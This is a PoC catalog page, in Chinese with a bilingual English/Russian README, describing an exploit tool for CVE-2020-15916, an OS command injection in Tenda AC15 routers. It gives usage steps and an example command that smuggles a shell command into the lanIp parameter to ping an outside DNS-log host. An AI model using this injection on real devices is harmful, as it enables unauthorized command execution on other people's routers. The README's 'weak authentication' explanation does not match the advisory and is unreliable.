POC详情: d97ee6b5b0edc3b408121696dbebc6dbb577b6b1

来源
关联漏洞
标题: Tenda AC15 AC1900 操作系统命令注入漏洞 (CVE-2020-15916)
描述:Tenda AC15 AC1900是中国腾达(Tenda)公司的一款无线路由器。 Tenda AC15 AC1900 15.03.05.19版本中的goform/AdvSetLanip端点存在安全漏洞。远程攻击者可借助‘lanIp POST’参数中的shell元字符利用该漏洞执行任意系统命令。
描述
This project is a PoC for exploiting CVE-2020-15916, a vulnerability that allows unauthorized changes to the LAN configuration of a device
介绍

# EN
**GenLANConfigAttack** -  is a PoC for exploiting **CVE-2020-15916**, a vulnerability that allows unauthorized changes to the LAN configuration of a device.

## Features
- Exploits LAN configuration vulnerability
- Sends malicious payload to alter network settings
- Bypasses security mechanisms for gaining control over the LAN

## How to Use
1. Clone this repository:
   ```bash
   git clone https://github.com/geniuszly/CVE-2020-15916
   ```
2. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```
3. Run the exploit:
   ```bash
   python GenLANConfigAttack.py
   ```

### Parameters
- `target_ip`: The IP address of the target device.
- `ping_command`: Command to execute on the target device.
- `session_password`: Password for session access.

## Example
```bash
python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
```

```bash
[Response from 192.168.0.1]: 
{"success":true,"message":"LAN IP configuration updated successfully"}
```

## CVE Reference
This PoC is for the CVE-2020-15916 vulnerability, which allows attackers to alter the LAN configuration of vulnerable devices by exploiting a weak authentication mechanism.

## Disclaimer
This tool is provided for educational purposes only. Use it responsibly and only in environments where you have explicit permission.


# RU
**GenLANConfigAttack** представляет собой PoC для эксплуатации уязвимости **CVE-2020-15916**, которая позволяет несанкционированно изменять конфигурацию LAN устройства.

## Функции
- Использует уязвимость конфигурации LAN
- Отправляет вредоносный payload для изменения настроек сети
- Обходит механизмы безопасности для получения контроля над LAN

## Как использовать
1. Клонируйте репозиторий:
   ```bash
   git clone https://github.com/geniuszly/CVE-2020-15916
   ```
2. Установите зависимости:
   ```bash
   pip install -r requirements.txt
   ```
3. Запустите эксплойт:
   ```bash
   python GenLANConfigAttack.py
   ```

### Параметры
- `target_ip`: IP-адрес целевого устройства.
- `ping_command`: Команда для выполнения на целевом устройстве.
- `session_password`: Пароль для сессионного доступа.

## Пример
```bash
python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
```

```bash
[Ответ от 192.168.0.1]: 
{"success":true,"message":"Конфигурация LAN IP успешно обновлена"}
```
## CVE-ссылка
Этот PoC эксплуатирует уязвимость CVE-2020-15916, которая позволяет злоумышленникам изменять конфигурацию LAN на уязвимых устройствах, используя слабую аутентификацию.

## Отказ от ответственности
Этот инструмент предоставляется исключительно в образовательных целях. Используйте его ответственно и только в тех средах, где у вас есть явное разрешение.
文件快照

[4.0K] /data/pocs/d97ee6b5b0edc3b408121696dbebc6dbb577b6b1 ├── [2.4K] GenLANConfigAttack.py ├── [1.0K] LICENSE └── [3.5K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。